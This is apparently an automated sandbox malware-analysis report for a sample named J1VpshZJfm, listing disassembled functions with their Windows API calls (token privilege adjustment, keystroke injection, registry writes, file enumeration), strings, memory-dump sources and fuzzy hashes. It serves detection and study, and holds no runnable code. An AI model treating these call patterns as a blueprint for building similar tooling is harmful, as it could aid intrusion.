String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 042fd93997d44d1a54b754509910d8c92a3bcccee0d2c43dec21b148e30656b1
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 5AE09A7494010DAFDB10EFA4D9496DD7BB4EF04301F1006A1FD05D6680DA319A559A62

Function 01881048 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01881059

Memory Dump Source

Source File: 00000000.00000002.1605418464.000000000187E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0187E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_187e000_J1VpshZJfm.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 81ec95bf92639b95115b9cfe5eff9b83a1edfad3ae7bad6abf4a037d9d077821
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: B8E0E67494010DDFDB00EFF4D94D6DD7BB4EF04301F100661FD01D2280DA319E509A62

Non-executed Functions

Function 00F1CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00E92612: GetWindowLongW.USER32(?,000000EB), ref: 00E92623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00F1CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F1CB95
GetWindowLongW.USER32(?,000000F0), ref: 00F1CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F1CC00
SendMessageW.USER32 ref: 00F1CC29
_wcsncpy.LIBCMT ref: 00F1CC95
GetKeyState.USER32(00000011), ref: 00F1CCB6
GetKeyState.USER32(00000009), ref: 00F1CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F1CCD9
GetKeyState.USER32(00000010), ref: 00F1CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F1CD0C
SendMessageW.USER32 ref: 00F1CD33
SendMessageW.USER32(?,00001030,?,00F1B348), ref: 00F1CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00F1CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F1CE60
SetCapture.USER32(?), ref: 00F1CE69
ClientToScreen.USER32(?,?), ref: 00F1CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F1CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F1CEF5
ReleaseCapture.USER32 ref: 00F1CF00
GetCursorPos.USER32(?), ref: 00F1CF3A
ScreenToClient.USER32(?,?), ref: 00F1CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 00F1CFA3
SendMessageW.USER32 ref: 00F1CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00F1D00E
SendMessageW.USER32 ref: 00F1D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F1D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F1D06D
GetCursorPos.USER32(?), ref: 00F1D08D
ScreenToClient.USER32(?,?), ref: 00F1D09A
GetParent.USER32(?), ref: 00F1D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 00F1D123
SendMessageW.USER32 ref: 00F1D154
ClientToScreen.USER32(?,?), ref: 00F1D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F1D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00F1D20C
SendMessageW.USER32 ref: 00F1D22F
ClientToScreen.USER32(?,?), ref: 00F1D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F1D2B5

Part of subcall function 00E925DB: GetWindowLongW.USER32(?,000000EB), ref: 00E925EC

GetWindowLongW.USER32(?,000000F0), ref: 00F1D351

Strings

F, xrefs: 00F1D235
@GUI_DRAGID, xrefs: 00F1CE9C

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: e87ee141766767303473c79a0fa05a06c5e25c71f0edada59f4ecec0f69a2ee7
Instruction ID: 9f88b06aeacc8d1ef47c2cd756ab84aa11fb454611278119c815a6e8732e5ea9
Opcode Fuzzy Hash: e87ee141766767303473c79a0fa05a06c5e25c71f0edada59f4ecec0f69a2ee7
Instruction Fuzzy Hash: 8F42AB74608344AFDB24CF24C844AEABBE5FF89721F14091DF695D72A1C731E894EB92

Function 00EA6F9E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EA71C3
_memset.LIBCMT ref: 00EA7539
_memmove.LIBCMT ref: 00EA76AC

Strings

DEFINE, xrefs: 00EE2103
[:<:]], xrefs: 00EA7479
\b(?<=\w), xrefs: 00EE3773
Q\E, xrefs: 00EA7FCB
[:>:]], xrefs: 00EA7492
_, xrefs: 00EE23CB
3c, xrefs: 00EE23A0
\b(?=\w), xrefs: 00EE3769

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memmove$_memset
String ID: 3c$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_
API String ID: 1357608183-3681475764
Opcode ID: f8e18719510e49f8ab38c7d28b5d55e367092e13962936f75e64c0deaa1c55a8
Instruction ID: 618358bce28e5e03759f5af9335c5832258aa49d6c123285ed68b991275289fc
Opcode Fuzzy Hash: f8e18719510e49f8ab38c7d28b5d55e367092e13962936f75e64c0deaa1c55a8
Instruction Fuzzy Hash: 4D93A271A00259DBDF24CF69C881BEDB7B1FF48314F25916AE945BB291E770AE81CB40

Function 00E948D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00E948DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00ECD665
IsIconic.USER32(?), ref: 00ECD66E
ShowWindow.USER32(?,00000009), ref: 00ECD67B
SetForegroundWindow.USER32(?), ref: 00ECD685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00ECD69B
GetCurrentThreadId.KERNEL32 ref: 00ECD6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECD6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00ECD6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 00ECD6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 00ECD6CF
SetForegroundWindow.USER32(?), ref: 00ECD6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ECD6E7
keybd_event.USER32(00000012,00000000), ref: 00ECD6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ECD6FC
keybd_event.USER32(00000012,00000000), ref: 00ECD701
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ECD70A
keybd_event.USER32(00000012,00000000), ref: 00ECD70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00ECD719
keybd_event.USER32(00000012,00000000), ref: 00ECD71E
SetForegroundWindow.USER32(?), ref: 00ECD721
AttachThreadInput.USER32(?,?,00000000), ref: 00ECD748

Strings

Shell_TrayWnd, xrefs: 00ECD660

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: d46008b5452735a1b40667a6c07b3d5bdc243c87c29c57645066125166b0e997
Instruction ID: 05bb046f7aeef1463278c5cc1db8443efd44dbdd212f3ae37173a93c072d5e0d
Opcode Fuzzy Hash: d46008b5452735a1b40667a6c07b3d5bdc243c87c29c57645066125166b0e997
Instruction Fuzzy Hash: 5A319371A4031CBBEB206F618C49FBF7E6DEB44B50F11803AFA04FA1D1C6B15811BAA0

Function 00EE8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00EE87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EE882B
Part of subcall function 00EE87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EE8858
Part of subcall function 00EE87E1: GetLastError.KERNEL32 ref: 00EE8865

_memset.LIBCMT ref: 00EE8353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00EE83A5
CloseHandle.KERNEL32(?), ref: 00EE83B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EE83CD
GetProcessWindowStation.USER32 ref: 00EE83E6
SetProcessWindowStation.USER32(00000000), ref: 00EE83F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EE840A

Part of subcall function 00EE81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EE8309), ref: 00EE81E0
Part of subcall function 00EE81CB: CloseHandle.KERNEL32(?,?,00EE8309), ref: 00EE81F2

Strings

default, xrefs: 00EE8405
winsta0, xrefs: 00EE83C8
, xrefs: 00EE8362

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: bd7b11670e32bf111ca065e477a7943ff52cc642e84f2abdf82ea344a3991695
Instruction ID: 8fdf54560983eb244cebb318dc1866b6a1f1b3172941004a0e70a82c2cf892d6
Opcode Fuzzy Hash: bd7b11670e32bf111ca065e477a7943ff52cc642e84f2abdf82ea344a3991695
Instruction Fuzzy Hash: 82817B7190028DAFDF119FA5CE45AEE7BB8EF04308F149169F919B2161DB318E18EB20

Function 00EFC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00EFC78D
FindClose.KERNEL32(00000000), ref: 00EFC7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EFC806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EFC81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 00EFC844
__swprintf.LIBCMT ref: 00EFC890
__swprintf.LIBCMT ref: 00EFC8D3

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

__swprintf.LIBCMT ref: 00EFC927

Part of subcall function 00EB3698: __woutput_l.LIBCMT ref: 00EB36F1

__swprintf.LIBCMT ref: 00EFC975

Part of subcall function 00EB3698: __flsbuf.LIBCMT ref: 00EB3713
Part of subcall function 00EB3698: __flsbuf.LIBCMT ref: 00EB372B

__swprintf.LIBCMT ref: 00EFC9C4
__swprintf.LIBCMT ref: 00EFCA13
__swprintf.LIBCMT ref: 00EFCA62

Strings

%4d, xrefs: 00EFC8CD
%4d%02d%02d%02d%02d%02d, xrefs: 00EFC88A
%02d, xrefs: 00EFC91B, 00EFC925, 00EFC973, 00EFC9C2, 00EFCA11, 00EFCA60

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: cc0631c1e3fd750ccf35ef1ae6597c71384bd197b43002b28c69fd172e46e8de
Instruction ID: bfb97f82e1300fcf2e5bacd5a5f0edcd45980e7df66c94b067d9a0037c343474
Opcode Fuzzy Hash: cc0631c1e3fd750ccf35ef1ae6597c71384bd197b43002b28c69fd172e46e8de
Instruction Fuzzy Hash: 6BA14EB1404344ABCB14EFA4C986DBFB7ECEF95704F40191DF595E6192EA34EA08CB62

Function 00EFEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00EFEFB6
_wcscmp.LIBCMT ref: 00EFEFCB
_wcscmp.LIBCMT ref: 00EFEFE2
GetFileAttributesW.KERNEL32(?), ref: 00EFEFF4
SetFileAttributesW.KERNEL32(?,?), ref: 00EFF00E
FindNextFileW.KERNEL32(00000000,?), ref: 00EFF026
FindClose.KERNEL32(00000000), ref: 00EFF031
FindFirstFileW.KERNEL32(*.*,?), ref: 00EFF04D
_wcscmp.LIBCMT ref: 00EFF074
_wcscmp.LIBCMT ref: 00EFF08B
SetCurrentDirectoryW.KERNEL32(?), ref: 00EFF09D
SetCurrentDirectoryW.KERNEL32(00F48920), ref: 00EFF0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00EFF0C5
FindClose.KERNEL32(00000000), ref: 00EFF0D2
FindClose.KERNEL32(00000000), ref: 00EFF0E4

Strings

*.*, xrefs: 00EFF048

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: dcffeb3715d2b505f6d3931d1f071722d394f15537d96f4ec46f0858d7f39279
Instruction ID: a8ebc19a24c0660e78278539031dec12562fd0c35e124d1ddff828fbe26d7a7c
Opcode Fuzzy Hash: dcffeb3715d2b505f6d3931d1f071722d394f15537d96f4ec46f0858d7f39279
Instruction Fuzzy Hash: 3031F33250120D7ADB24EFB4DC49AFE77AC9F48364F104175EA04F20A1EF70DA84EA61

Function 00F10857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F10953
RegCreateKeyExW.ADVAPI32(?,?,00000000,00F1F910,00000000,?,00000000,?,?), ref: 00F109C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F10A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F10A92
RegCloseKey.ADVAPI32(?), ref: 00F10DB2
RegCloseKey.ADVAPI32(00000000), ref: 00F10DBF

Strings

REG_MULTI_SZ, xrefs: 00F10B7A
REG_SZ, xrefs: 00F10AD0
REG_BINARY, xrefs: 00F10D4D
REG_QWORD, xrefs: 00F10D00
REG_DWORD, xrefs: 00F10C83
REG_EXPAND_SZ, xrefs: 00F10A2F

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: ae727d229a7d885f5b17ec14869a3b176158b87d218c691dfc8d29546a2abccb
Instruction ID: 7279d64ca19465e7efdd30d36da480a72e5db6f9f06c9585c0367ea4c538a340
Opcode Fuzzy Hash: ae727d229a7d885f5b17ec14869a3b176158b87d218c691dfc8d29546a2abccb
Instruction Fuzzy Hash: 25026C756046019FCB14EF28C851E6AB7E5FF89320F05895CF899AB362DB70EC85DB81

Function 00EFF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00EFF113
_wcscmp.LIBCMT ref: 00EFF128
_wcscmp.LIBCMT ref: 00EFF13F

Part of subcall function 00EF4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00EF43A0

FindNextFileW.KERNEL32(00000000,?), ref: 00EFF16E
FindClose.KERNEL32(00000000), ref: 00EFF179
FindFirstFileW.KERNEL32(*.*,?), ref: 00EFF195
_wcscmp.LIBCMT ref: 00EFF1BC
_wcscmp.LIBCMT ref: 00EFF1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 00EFF1E5
SetCurrentDirectoryW.KERNEL32(00F48920), ref: 00EFF203
FindNextFileW.KERNEL32(00000000,00000010), ref: 00EFF20D
FindClose.KERNEL32(00000000), ref: 00EFF21A
FindClose.KERNEL32(00000000), ref: 00EFF22C

Strings

*.*, xrefs: 00EFF190

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 9e9eed1d6c9cb63c7f18af926248cdd126f40011b879b9a8bd4d3f52b41a1754
Instruction ID: 138e8d13065136008f9ae7bf8f4baf79be211df7d27ba7ab899178560f3a5e88
Opcode Fuzzy Hash: 9e9eed1d6c9cb63c7f18af926248cdd126f40011b879b9a8bd4d3f52b41a1754
Instruction Fuzzy Hash: 5E31013650161DBAEB20EFB0EC49AFE77AC9F85364F105171EA00F20A1DB30DE49EA54

Function 00EFA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EFA20F
__swprintf.LIBCMT ref: 00EFA231
CreateDirectoryW.KERNEL32(?,00000000), ref: 00EFA26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00EFA293
_memset.LIBCMT ref: 00EFA2B2
_wcsncpy.LIBCMT ref: 00EFA2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00EFA323
CloseHandle.KERNEL32(00000000), ref: 00EFA32E
RemoveDirectoryW.KERNEL32(?), ref: 00EFA337
CloseHandle.KERNEL32(00000000), ref: 00EFA341

Strings

\??\%s, xrefs: 00EFA22B
\, xrefs: 00EFA247
:, xrefs: 00EFA252

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 4e0ab84110f8dd97e69ee717f0d8fb45fcfd765b4407c0994158d7785c4007d5
Instruction ID: 7248e4327a2be27ad5e02abf50d23afe24ae8d6162bd7a34079b0354cd65adea
Opcode Fuzzy Hash: 4e0ab84110f8dd97e69ee717f0d8fb45fcfd765b4407c0994158d7785c4007d5
Instruction Fuzzy Hash: 4F318FB1500149ABDB219FA0DC49FEB77BCEF89744F1441BAFA08E6160EA7096448B25

Function 00EE7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EE821E
Part of subcall function 00EE8202: GetLastError.KERNEL32(?,00EE7CE2,?,?,?), ref: 00EE8228
Part of subcall function 00EE8202: GetProcessHeap.KERNEL32(00000008,?,?,00EE7CE2,?,?,?), ref: 00EE8237
Part of subcall function 00EE8202: HeapAlloc.KERNEL32(00000000,?,00EE7CE2,?,?,?), ref: 00EE823E
Part of subcall function 00EE8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EE8255

Part of subcall function 00EE829F: GetProcessHeap.KERNEL32(00000008,00EE7CF8,00000000,00000000,?,00EE7CF8,?), ref: 00EE82AB
Part of subcall function 00EE829F: HeapAlloc.KERNEL32(00000000,?,00EE7CF8,?), ref: 00EE82B2
Part of subcall function 00EE829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EE7CF8,?), ref: 00EE82C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EE7D13
_memset.LIBCMT ref: 00EE7D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EE7D47
GetLengthSid.ADVAPI32(?), ref: 00EE7D58
GetAce.ADVAPI32(?,00000000,?), ref: 00EE7D95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EE7DB1
GetLengthSid.ADVAPI32(?), ref: 00EE7DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EE7DDD
HeapAlloc.KERNEL32(00000000), ref: 00EE7DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EE7E05
CopySid.ADVAPI32(00000000), ref: 00EE7E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EE7E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EE7E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EE7E77

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 60eceb52d2cf45c7b7bcbd16eaf538fbe259c464fda6e2574f656477ebf4ff71
Instruction ID: ac578de1d39ce414c34fe07c6765bac2696489b0198a3b627608cb339afbf539
Opcode Fuzzy Hash: 60eceb52d2cf45c7b7bcbd16eaf538fbe259c464fda6e2574f656477ebf4ff71
Instruction Fuzzy Hash: F361497190424DAFDF00DFA5DC85AEEBBB9FF08304F048269E955A62A1DB319E05DB60

Function 00EA66E1 Relevance: 20.9, Strings: 16, Instructions: 889COMMON

Download Yara Rule

Strings

LIMIT_MATCH=, xrefs: 00EE1170
CR), xrefs: 00EE1287
LIMIT_RECURSION=, xrefs: 00EE11FC
NO_START_OPT), xrefs: 00EE114F
BSR_ANYCRLF), xrefs: 00EE131E
ANYCRLF), xrefs: 00EE12FB
CRLF), xrefs: 00EE12C1
3c, xrefs: 00EA68FF
UTF16), xrefs: 00EE10CF
BSR_UNICODE), xrefs: 00EE1338
UCP), xrefs: 00EE110D
NO_AUTO_POSSESS), xrefs: 00EE112E
_, xrefs: 00EE1465, 00EE150C, 00EE15B4
ANY), xrefs: 00EE12DE
LF), xrefs: 00EE12A4
UTF), xrefs: 00EE10FA

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
